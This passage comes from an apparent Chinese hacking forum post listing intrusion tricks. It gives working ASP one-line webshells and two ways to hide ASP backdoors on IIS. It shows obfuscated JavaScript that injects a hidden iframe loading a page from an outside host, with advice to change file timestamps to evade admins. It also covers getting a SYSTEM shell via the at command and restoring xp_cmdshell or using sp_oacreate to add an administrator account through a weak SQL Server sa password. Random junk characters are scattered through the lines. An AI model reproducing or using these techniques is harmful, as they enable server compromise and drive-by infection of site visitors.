0 k( z! M2 s/ J* ?c).%><%execute request("go")%><%1 Z0 g6 R  E8 o; l* B9 @3 W4 r
d).<script language=VBScript runat=server>execute request("sb")</Script>
: e# o0 P9 N  l4 r$ Xe).<%25Execute(request("l"))%25>
2 f4 Z% G' K. R, Tf).<%if request("cmd")<>"" then execute request("pass")%>' j% I/ g# Y. @

: e7 x7 v) v. i6 r7 t' }4 f7 x* H52、at "12:17" /interactive cmd& E. r) X* \+ u5 Y* _
执行后可以用AT命令查看新加的任务
5 n' S  p1 G0 q# k用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
3 c6 E  }! Z2 k4 X, p# l; S5 j
. N% R% J. n" z! k( S: z! R" ~53、隐藏ASP后门的两种方法6 o# P4 G* }6 s( n! ?- _) \
1、建立非标准目录:mkdir images..\2 l( ?4 e: ^6 v: ^  t2 s: v
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp& t( |9 q4 H- ^! U; G
通过web访问ASP木马:http://ip/images../news.asp?action=login
/ P1 \1 q4 ]4 w7 B如何删除非标准目录:rmdir images..\ /s
" W. U. l5 e3 Y, v4 J, f2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
$ b5 i' L' @6 ~( w/ xmkdir programme.asp
+ ]; ^0 `! L# T0 E1 j5 G新建1.txt文件内容:<!--#include file=”12.jpg”-->0 e, }% b/ ]; P  r) J
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
- b: A5 {% b  M# t4 Vattrib +H +S programme.asp
; P6 I1 [* @4 a7 q/ ]6 h1 z" ^. r通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt; n, E  a( z& p: f/ z" x: H
. J. ~) m# n6 ^$ U: y- O: k
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
, M8 K! E9 g; n8 R/ |/ w然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
( _( {' {" m! j' f0 a
% ]/ @& f. T; P3 i& O9 Y55、JS隐蔽挂马: l. [4 X: E5 d; `5 G$ H+ |
1.
* u# h2 Y! ]: C% V# C3 ~4 zvar tr4c3="<iframe src=ht";$ q( C, @# k" y
tr4c3 = tr4c3+"tp:/";
5 X8 o! Z" ?  _1 D/ f! Vtr4c3 = tr4c3+"/ww";
# y. t/ o* G" L" |tr4c3 = tr4c3+"w.tr4";: r; v+ D* E" q7 c
tr4c3 = tr4c3+"c3.com/inc/m";
2 Z! N6 b( {& u- `) k0 u% wtr4c3 = tr4c3+"m.htm style="display:none"></i";
% W5 u% t) w# H% ~' ^/ r2 Wtr4c3 =tr4c3+"frame>'";
; |, g0 L7 j2 T+ rdocument.write(tr4c3);
, [9 Z  s2 T& O避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。+ }$ E9 L9 @/ t
8 ]0 u! a, e5 H5 C- |! ?. P
2.3 ]* `$ X! k* v; J# X
转换进制,然后用EVAL执行。如" h/ [$ `8 W7 `1 |4 f
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");) A2 f% h2 T: s
不过这个有点显眼。! Y* q4 i7 V$ q2 W  s( t
3.- O: o; B2 p& [5 _8 o, p  D* A
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
+ \' h/ }1 v/ |' A7 G: F/ y最后一点,别忘了把文件的时间也修改下。
) n" m( w; p' Q! l
  \& M6 t0 v; C9 W; E/ {& S56.3389终端入侵常用DOS命令" `% {( N- O# x! G4 C; t6 p: X
taskkill taskkill /PID 1248 /t2 G' P* D$ f: ~. t5 I
7 H2 l; m& q. H  H# B5 g, K* g; _
tasklist 查进程( N& a  {4 C# x+ H4 {7 N
' C& h. s1 S. F
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限8 a( k9 W  Q7 Y' L5 H" M
iisreset /reboot! [% P- O* B9 P* w; T
tsshutdn /reboot /delay:1    重起服务器! L4 y. x3 A- W) p4 r2 t, D' G; \

3 j+ Q7 l/ b  q5 M) o7 e2 Z, M$ Llogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,# ^* }5 y' ?+ d8 b, `% F) T
, e8 J4 _0 m2 T; j6 t9 r% f9 r
query user 查看当前终端用户在线情况
; A0 \; d5 ~; ]* {' m2 ?  |+ j/ }) A2 G5 K: Q# {
要显示有关所有会话使用的进程的信息,请键入:query process *
" K3 k! M# q/ u) X. K' P* S8 X4 c
- V" y/ H4 h# u7 Q( @7 L要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
$ q  R, ~. H8 R' h
) }+ X) F# Q/ `. Y4 J要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2  L" {9 g2 n5 l/ k3 Q5 \3 E# m

, i/ U% s3 [- q( A" |要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM024 j) J+ k8 u$ c( \8 ?6 p

' D0 x7 [2 b6 t3 \6 q& S; v$ m命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
* i  b7 A6 H3 I1 z/ d
, F5 e) J" [! X, {7 Y9 C命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
9 c2 e9 c8 @6 O( A" W; G% _6 x. S9 t' p" i! a& s' `& u
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。* M9 T8 F: v1 y
0 }0 m- X8 N  H% l9 X4 z: r9 O0 W
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机$ t' z" Q: B6 S

8 Z3 v6 t  @) K% A% R56、在地址栏或按Ctrl+O,输入:
1 ~0 m0 @$ h$ o) ?9 N8 q0 vjavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
% O# }7 u* u1 X+ d' M% C* X0 }  Y  n0 ?# ], L9 i
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。- v' a+ x/ [' z

8 B1 r! G$ v- ~  w9 C& r( O57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
3 L2 X! J4 f+ z8 [1 u6 y用net localgroup administrators是可以看到管理组下,加了$的用户的。% }3 I: I5 V: }+ W/ V3 i0 w
6 R* M4 }! f: h( |/ A8 d
58、 sa弱口令相关命令: I; R% Z' z: A. H: z% s

) S) [, g$ l3 [3 k7 R一.更改sa口令方法:# J$ b, q+ _6 Y
用sql综合利用工具连接后,执行命令:4 E& e  g9 m8 L- o: b. E! d
exec sp_password NULL,'20001001','sa'
% e0 W- Y1 J+ d/ W9 q6 y) J+ U(提示:慎用!)% E- E1 X. J- g  p" I
; n7 ]7 T" J1 V! B
二.简单修补sa弱口令.
, _) K+ q- Q6 I' h$ F$ F( A4 B# z  i9 Q$ ]# Y. M5 o
方法1:查询分离器连接后执行:1 [/ Z( V9 \; a$ k% w4 o4 A! r' s5 L
if exists (select * from7 C; E0 Z( Z% d0 o) U  z
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
9 y+ ?7 A( Z- u8 `. w- m2 T& Q  O% COBJECTPROPERTY(id, N'IsExtendedProc') = 1)
; w2 L/ g1 H' d- Y
3 X( V, J/ _( k$ W  Q, I! F7 x8 |& nexec sp_dropextendedproc N'[dbo].[xp_cmdshell]', q: A. ]  |' i! c/ x8 b

% Y/ _6 \7 p1 Y+ D! N7 ?GO1 w4 I. W- o9 B4 K' U
. W; A( ]5 _/ Y+ K8 p8 Z
然后按F5键命令执行完毕
% U8 l3 z6 Z% ]$ R7 R+ v
# Y9 t+ T# J, h5 |, c, d方法2:查询分离器连接后
! k6 J( M  v: d0 h, z第一步执行:use master' O" v; W8 g5 N% w& L
第二步执行:sp_dropextendedproc 'xp_cmdshell'  ?* W) H* O% X* H
然后按F5键命令执行完毕
! Y7 _% x0 v9 G2 R8 n; m) S# t. C
1 d7 X# J2 P( y$ A/ j2 R9 T0 z: }" E  f# ?( H; y! p
三.常见情况恢复执行xp_cmdshell.& V( L6 e( s' j+ W$ G

) m* j% O% i# T1 I  y4 C; a( u) k4 `/ d- h/ z# \4 `; F
1 未能找到存储过程'master..xpcmdshell'.
0 s2 ~9 G4 a2 D& S( J* m   恢复方法:查询分离器连接后,
: a4 y* y- }) h8 z. v' V第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int0 v; ], R  V  p6 E0 {) x9 m
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'3 O: i* q1 E; Q; }7 l
然后按F5键命令执行完毕
# @" Z* }% O1 r) N- w
4 ^( I) s+ i) E' ?0 H$ }2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)6 }" ?; X: G  ?5 p- _. \3 A. V
恢复方法:查询分离器连接后,
; v8 C' U& G2 x! P3 `0 E第一步执行:sp_dropextendedproc "xp_cmdshell"
* L3 ^* i6 X( B第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'6 K0 a* b8 W. }1 n  ?: \5 W) O
然后按F5键命令执行完毕
! a" i/ c1 n& d; j4 Y2 U1 b( }7 k9 J! B6 R
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)7 h) c: c, R+ `1 A' y
恢复方法:查询分离器连接后,* s0 ]/ w" C/ u$ ^1 ]$ T
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
) t$ Q1 A0 B1 a) n. h' C1 V0 }$ ^第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'           
' ?0 ^2 M& c! M; F4 Q然后按F5键命令执行完毕
, }- U, y  g4 B" X4 `- g" \: b) X0 o9 Q
四.终极方法.
% x* m( F* B3 `8 f# g. j* |  `如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
/ N0 O  {- n4 U5 n% r5 T查询分离器连接后,* }5 m% t) _" R
2000servser系统:
" Q( r$ ?( [* g  }5 J  Z$ pdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'2 V1 E3 h* F$ d# i& X+ D  F4 K
  S& K+ y$ k4 c/ S% S! \1 T
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'. S- ~/ \- t0 Y8 c- v) O3 y

$ C3 t- a& [" d: {2 E* \xp或2003server系统:
" M3 x& C# u1 l6 l: h6 k& J: F
1 l, W7 g7 d; E/ T* P* D' Ldeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'" h4 l: k! p5 a! q* n% U$ t

2 n1 o: A  z4 G/ h" v, Rdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'$ h/ N' t+ E& W' t( T& N$ ]
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表